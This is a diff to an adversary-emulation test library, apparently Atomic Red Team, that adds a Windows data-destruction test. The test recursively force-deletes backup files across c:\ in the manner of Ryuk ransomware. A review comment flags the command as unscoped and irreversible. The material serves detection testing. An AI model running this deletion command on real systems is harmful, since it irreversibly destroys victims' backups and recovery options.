diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index d57cabe4..ebd00c73 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -18,6 +18,8 @@ To maximize impact on the target organization in operations where network-wide a
- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
@@ -114,4 +116,20 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+```
+
+
+
diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml
index a0c216cc..cb61c927 100644
--- a/atomics/T1485/T1485.yaml
+++ b/atomics/T1485/T1485.yaml
@@ -87,4 +87,16 @@ atomic_tests:
executor:
name: bash
command: |
- dd of=#{file_to_overwrite} if=#{overwrite_source}
\ No newline at end of file
+ dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+- name: Windows - Delete Backup Files
+ description: |
+ Deletes backup files in a manner similar to Ryuk ransomware.
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ command: |
+ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
\ No newline at end of file
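Review bot: The new test's `command` recursively force-deletes every matching file under the whole of `c:\` and declares no `input_arguments`, so running it on anything other than a disposable host destroys real backups with no way to undo it. The dd test just above in this file is scoped through `#{file_to_overwrite}`; I would scope this one the same way, with a directory argument defaulting to a scratch folder seeded with dummy `.bak`/`.VHD` files, and say in the `description` that the deletion is irreversible. `c:\Backup*.*` and `c:\backup*.*` presumably match the same files on a default case-insensitive Windows volume, so keep both only if mirroring the original command string is the goal for detection purposes, and note that in the description. The file again ends without a trailing newline, which this same commit fixes for the dd command. The `atomic_tests` list this entry belongs to starts outside the hunk.

```yaml
- name: Windows - Delete Backup Files
  # … unchanged: description, supported_platforms …
  input_arguments:
    target_dir:
      description: Root of the directory tree searched for backup files to delete
      type: Path
      # constructed example default: a scratch directory holding dummy backup files
      default: '%temp%\T1485_backup_test'
  executor:
    name: command_prompt
    command: |
      del /s /f /q #{target_dir}\*.VHD #{target_dir}\*.bac #{target_dir}\*.bak #{target_dir}\*.wbcat #{target_dir}\*.bkf #{target_dir}\Backup*.* #{target_dir}\backup*.* #{target_dir}\*.set #{target_dir}\*.win #{target_dir}\*.dsk
```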
diff --git a/atomics/index.md b/atomics/index.md
index 88270e2c..e1b2e7c2 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -474,6 +474,7 @@
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #5: macOS/Linux - Overwrite file with DD [centos, linux, macos, ubuntu]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 243d8e5c..116f896d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -13903,7 +13903,19 @@ impact:
default: "/var/log/syslog"
executor:
name: bash
- command: dd of=#{file_to_overwrite} if=#{overwrite_source}
+ command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+'
+ - name: Windows - Delete Backup Files
+ description: 'Deletes backup files in a manner similar to Ryuk ransomware.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+ c:\backup*.* c:\*.set c:\*.win c:\*.dsk
'':
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index aef1b765..a4a50715 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -330,6 +330,7 @@
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)